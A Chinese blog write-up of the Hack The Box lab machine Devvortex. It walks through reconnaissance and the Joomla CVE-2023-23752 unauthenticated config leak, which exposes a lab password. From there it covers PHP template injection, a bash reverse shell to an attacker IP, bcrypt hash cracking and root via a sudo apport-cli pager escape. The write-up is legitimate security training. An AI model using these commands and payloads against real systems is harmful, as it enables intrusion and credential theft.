HTB靶场- Devvortex

端口探测

nmap -sV 10.10.11.242

在这里插入图片描述
首先访问一下80端口,发现跳转到这个域名上了,所以要做一个host绑定
在这里插入图片描述

sudo vi /etc/hosts

在这里插入图片描述
成功访问网站,通过观察发现是一个静态页面
在这里插入图片描述

目录扫描

python3 dirsearch.py -u http://devvortex.htb/ -e*

在这里插入图片描述

扫描以后也没有什么可以利用的信息,接下来在进行收集

子域名探测

使用gobuster进行子域名扫描,如果没有seclists字典工具,需要下载

apt install seclists

——————————
gobuster vhost -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://devvortex.htb/ --append-domain --no-error

在这里插入图片描述

可以看到扫描出来一个dev.devvortex.htb,还是需要host绑定
在这里插入图片描述
接下来我们在对子域名进行目录扫描
在这里插入图片描述
在这里插入图片描述
通过探测发现administrator,README.txt目录是有重要信息的
访问administrator目录,发现是joomla CMS
在这里插入图片描述
README.txt目录里泄露了版本信息
在这里插入图片描述
我们也可以通过joomscan这个工具进行扫描,得到版本号4.2.6

joomscan -u http://dev.devvortex.htb/

在这里插入图片描述

漏洞利用

Joomla4.2.6版本有一个未授权访问漏洞(CVE-2023-23752)
未授权路径

/api/index.php/v1/config/application?public=true

有账号和密码,数据库相关信息,可以尝试进行登录
在这里插入图片描述
lewis/P4ntherg0t1n5r3c0n##
在这里插入图片描述
成功登录
在这里插入图片描述
观察发现有两个用户
在这里插入图片描述

代码注入

并且在这里发现了代码注入
在这里插入图片描述
在这里插入图片描述
在error.php中加入phpinfo();看看是否执行,千万别忘了保存
在这里插入图片描述
成功执行
在这里插入图片描述

反弹shell

进行反弹shell

system(“bash -c ‘bash -i >& /dev/tcp/10.10.14.49/1234 0>&1’”);

在这里插入图片描述
在kali中进行监听

nc -lnvp 1234

访问http://dev.devvortex.htb/templates/cassiopeia/error.php进行代码的执行

在这里插入图片描述
成功反弹shell,但是权限不够,所以我们提升一下权限
进行会话交互

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

数据库连接

由于未授权漏洞我们可知是一个mysql数据库并且在joomla库中
进行连接数据库

mysql -u lewis -p
在进行输入密码

在这里插入图片描述

使用joomla数据库
use joomla;
展示数据库中的表
show tables;
把表中的数据显示出来
select * from sd4fg_users;

在这里插入图片描述
在这里插入图片描述

将logan的密码放在一个txt里
echo ‘$2y 10 10 10IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12’ >pass.txt
将hash值破解出来得到密码
hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

在这里插入图片描述

ssh连接

进行ssh连接

ssh logan@10.10.11.242

在这里插入图片描述
得到了user的flag
在这里插入图片描述

权限提升

查看一下sudo的权限,发现有一个apport-cli
在这里插入图片描述
去网上搜索发现有漏洞 地址
在这里插入图片描述
先创建一个pid

sleep 5000 &

在这里插入图片描述
进行连接

sudo /usr/bin/apport-cli -f --pid=4682

在这里插入图片描述
kill pid

kill 4682

在这里插入图片描述
输入V,在输入!进入到交互页面
在这里插入图片描述
现在是root权限
在这里插入图片描述
成功拿到root的flag
在这里插入图片描述

  • 19
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值